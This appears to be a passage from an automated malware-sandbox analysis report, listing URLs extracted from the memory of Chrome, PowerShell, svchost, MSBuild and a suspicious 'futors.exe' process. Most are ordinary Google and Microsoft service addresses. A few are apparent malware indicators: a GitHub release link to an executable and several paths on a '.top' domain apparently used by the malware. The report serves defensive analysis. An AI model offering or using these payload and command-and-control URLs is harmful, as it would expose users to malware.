Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/glic/intro?20
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/glic2
Source: chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/glicbN
Source: powershell.exe, 00000008.00000002.938454172.000001551BDAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: futors.exe, 0000002B.00000003.1697859830.0000000000866000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/legendary99999/dsfadsfafd/releases/download/dfgvsfdvbafd/gron12321.exee
Source: powershell.exe, 00000005.00000002.906544930.00000000054E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.938454172.000001551C7AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//c
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000002D.00000002.1761365220.00005B0400004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002D.00000002.1772558182.00005B0400A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718054356.00005B0401DC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: 68qi5p.27.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 0000002D.00000002.1777183033.00005B0400EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846561770.00005B040193C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 0000002D.00000003.1716539122.00005B0400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716667387.00005B0401114000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/
Source: chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/:
Source: chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/J
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default_defaultult
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_defaultu
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/ebapp
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdler7
Source: chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002D.00000002.1845374902.00005B0401628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1774896937.00005B0400B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002D.00000002.1845374902.00005B0401628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1774896937.00005B0400B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 0000002D.00000002.1845374902.00005B0401628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1774896937.00005B0400B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000002D.00000002.1776483889.00005B0400D60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763732000.00005B0400610000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: json[1].json.27.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&amp;riverAgeMinutes=2880&amp;navAgeMin
Source: json[1].json.27.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: powershell.exe, 00000005.00000002.908984573.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BBF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: futors.exe, 0000002B.00000003.1703799874.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/
Source: futors.exe, 0000002B.00000003.1703799874.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/$
Source: futors.exe, 0000002B.00000003.1857430983.00000000008D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/953100962/0fb6522f-c6fd
Source: futors.exe, 0000002B.00000003.1697859830.00000000008A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/954811811/dc4de189-3672
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.clients6.google.com
Source: chrome.exe, 0000002D.00000002.1750136215.000001F7DA697000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/Ge
Source: chrome.exe, 0000002D.00000002.1790205773.00005B0401260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 0000002D.00000002.1774579785.00005B0400B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808228&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808249&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739894676&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776059865.00005B0400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000002D.00000003.1716539122.00005B0400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716667387.00005B0401114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716476239.00005B0401700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 0000002D.00000002.1774532350.00005B0400B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://passwords.google/
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 0000002D.00000002.1845939127.00005B0401738000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 0000002D.00000003.1672187166.00005B04012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776483889.00005B0400D60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763732000.00005B0400610000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 0000002D.00000002.1764451261.00005B04008F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000002D.00000002.1764451261.00005B04008F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000002D.00000002.1763231323.00005B040052C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: MSBuild.exe, 00000018.00000002.1573999949.00000000012C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/
Source: MSBuild.exe, 00000018.00000002.1573999949.00000000012C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/M
Source: MSBuild.exe, 00000018.00000002.1574435036.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqo
Source: MSBuild.exe, 00000018.00000002.1573999949.00000000012C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqo&
Source: MSBuild.exe, 00000018.00000002.1574913267.00000000012F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqoWRY
Source: MSBuild.exe, 00000018.00000002.1574435036.00000000012D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqoy
Source: MSBuild.exe, 00000018.00000002.1574435036.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/ment
Source: chrome.exe, 0000002D.00000002.1761614499.00005B0400094000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 0000002D.00000002.1777183033.00005B0400EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846561770.00005B040193C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: chrome.exe, 0000002D.00000002.1763772489.00005B040064C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690091310.00005B0400640000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000F.00000003.1369022633.0000021485049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369602878.0000021485037000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369602878.0000021485037000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: 68qi5p.27.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: chrome.exe, 0000002D.00000003.1671766690.00005B04015E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002D.00000002.1846617251.00005B0401950000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000002D.00000002.1790205773.00005B0401260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000002D.00000002.1774532350.00005B0400B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/#safe
